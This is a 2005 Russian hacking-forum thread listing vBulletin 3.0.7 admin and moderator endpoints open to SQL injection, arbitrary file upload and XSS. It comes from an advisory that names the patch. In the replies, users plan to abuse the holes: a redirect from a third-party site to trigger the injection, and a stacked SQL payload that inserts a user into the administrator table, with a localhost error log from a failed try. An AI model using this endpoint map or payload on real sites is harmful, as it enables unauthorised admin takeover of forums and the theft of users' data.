ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vBulletin SQL INJ <=3.0.7
  #1  
Старый 27.09.2005, 23:01
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
Talking vBulletin SQL INJ <=3.0.7

Код:
Продукт: vBulletin
URL: http://vbulletin.com
Версия: <= vBulletin 3.0.7
Уязвимость: SQL-инъекция и загрузка произвольных файлов

SQL-Injection:

/joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
/modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
/modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>
/modcp/user.php:
GET: <do=avatar&userid=0XF>

/admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>
/admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
/admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
/admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
/admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
/admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>
/admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
/admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
/admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>
/admincp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
/admincp/usertools.php:
POST: <do=updateprofilepic>
/admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

Загрузка произвольных файлов:

/admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>

XSS:

/modcp/index.php:
GET: <do=frames&loc=[XSS]>
/modcp/user.php:
GET: <do=gethost&ip=[XSS]>
/admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
/admincp/index.php:
GET: <redirect=[XSS]>
GET: <do=frames&loc=[XSS]>
/admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
/admincp/usertitle.php:
GET: <do=gethost&ip=[XSS]>
/admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
/admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
/admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]>

Решение: обновить до версии vBulletin 3.0.9
Источник http://www.securityinfo.ru/2005/09/s...vbulletin.html
 
Ответить с цитированием

  #2  
Старый 29.09.2005, 15:47
Mastermind
Познающий
Регистрация: 21.07.2005
Сообщений: 52
Провел на форуме:
213512

Репутация: 8
По умолчанию

какой смысл всех этих уязвимостей, если их юзанье доступно только модераторам (с доступом в modcp) и админам...

kolorom,
/admincp/image.php - тебе не кажется, что сюда имеет доступ только админ?
 
Ответить с цитированием

  #3  
Старый 29.09.2005, 17:06
Sn_key
Участник форума
Регистрация: 07.03.2005
Сообщений: 160
Провел на форуме:
418635

Репутация: 30
Отправить сообщение для Sn_key с помощью ICQ
По умолчанию

Отвечаю! Эта уязвимость неактуальна!
Вот линк:
http://forum.antichat.ru/threadnav9723-1-10.html
 
Ответить с цитированием

  #4  
Старый 30.09.2005, 12:51
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

ёпт если переносите тему то предупреждайте а то инфа может выйти за пределы=)))
Визарт внимательным надо быть!
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 30.09.2005, 14:52
SK | Heaton
Постоянный
Регистрация: 18.06.2005
Сообщений: 872
Провел на форуме:
3007945

Репутация: 765


Отправить сообщение для SK | Heaton с помощью ICQ
По умолчанию

2 m0nzt3r... Секреты есть секреты... лол..
 
Ответить с цитированием

  #6  
Старый 01.10.2005, 18:38
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Я то тут причем...я выложил ее перенесли а дальше это уже по вашей косоглазости...
 
Ответить с цитированием

  #7  
Старый 20.12.2005, 14:38
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

ПОЧЕМУЖЕ не актуальна?!!! Ёмаё! Проявите воображение! Хакеры...
Предпаложим есть SQL inj (GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>)... БЕРЕм левый сайт ставим на нем редирект на Эту sql'ку. И вся фишка заключается не выводе на экран всех паролей (Как все привыкли), а например которая вставляет нового админа или меняет его пасс.! ))))))))))
 
Ответить с цитированием

  #8  
Старый 24.12.2005, 02:33
Enter.beta
Новичок
Регистрация: 04.11.2005
Сообщений: 12
Провел на форуме:
18677

Репутация: 0
По умолчанию

POMOGITE CIUT DODELOT
vot tak ideja v top cto vi regites na forume cto lomajite,
potom delajete etu sql injekciju
Цитата:
INSERT INTO " . TABLE_PREFIX . "administrator (userid, adminpermissions) VALUES (vash_ID, PRAVA)
Po ideje vi polucite prava admina
vot kto mozet skazite kakoj TABLE_PREFIX v vB, ato stavit len i kakije prava u korenogo admina obichno tot cto na pervoj stroke v baze dannih

vsio eto obosnovano na 3.5.2 mozet v 3.0.8 podrugomu uvi drugoj versiji ne nashol esli you kogo est vilzite php fail /upload/install/install.php
 
Ответить с цитированием

  #9  
Старый 24.12.2005, 06:50
KP0T
Новичок
Регистрация: 13.03.2005
Сообщений: 29
Провел на форуме:
111754

Репутация: 0
По умолчанию

А Я знаю зачем xss в админке, вот напримеро пасти других админов, такая типа защита от дурака на форуме на тему садо маза.
 
Ответить с цитированием

  #10  
Старый 24.12.2005, 18:08
Enter.beta
Новичок
Регистрация: 04.11.2005
Сообщений: 12
Провел на форуме:
18677

Репутация: 0
По умолчанию

nda toka admin ili mod kazis mogut zalid sql inj
esli komu interesno vot error
Цитата:
Database error in vBulletin 3.0.7:

Invalid SQL:
SELECT * FROM vb3_calendarcustomfield
WHERE calendarcustomfieldid = 58; INSERT INTO vb3_administrator (userid, adminpermissions) VALUES (2, 65532);

mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO vb3_administrator (userid, adminpermissions) VALU

mysql error number: 1064

Date: Saturday 24th of December 2005 02:04:14 PM
Script: http://localhost/upload/admincp/admincalendar.php?do=addcustom&calendarcustomfield id=58;%20INSERT%20INTO%20vb3_administrator%20(user id,%20adminpermissions)%20VALUES%20(2,%2065532);
Referer: http://localhost/wtf.htm
Username: Admin
IP Address: 127.0.0.1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ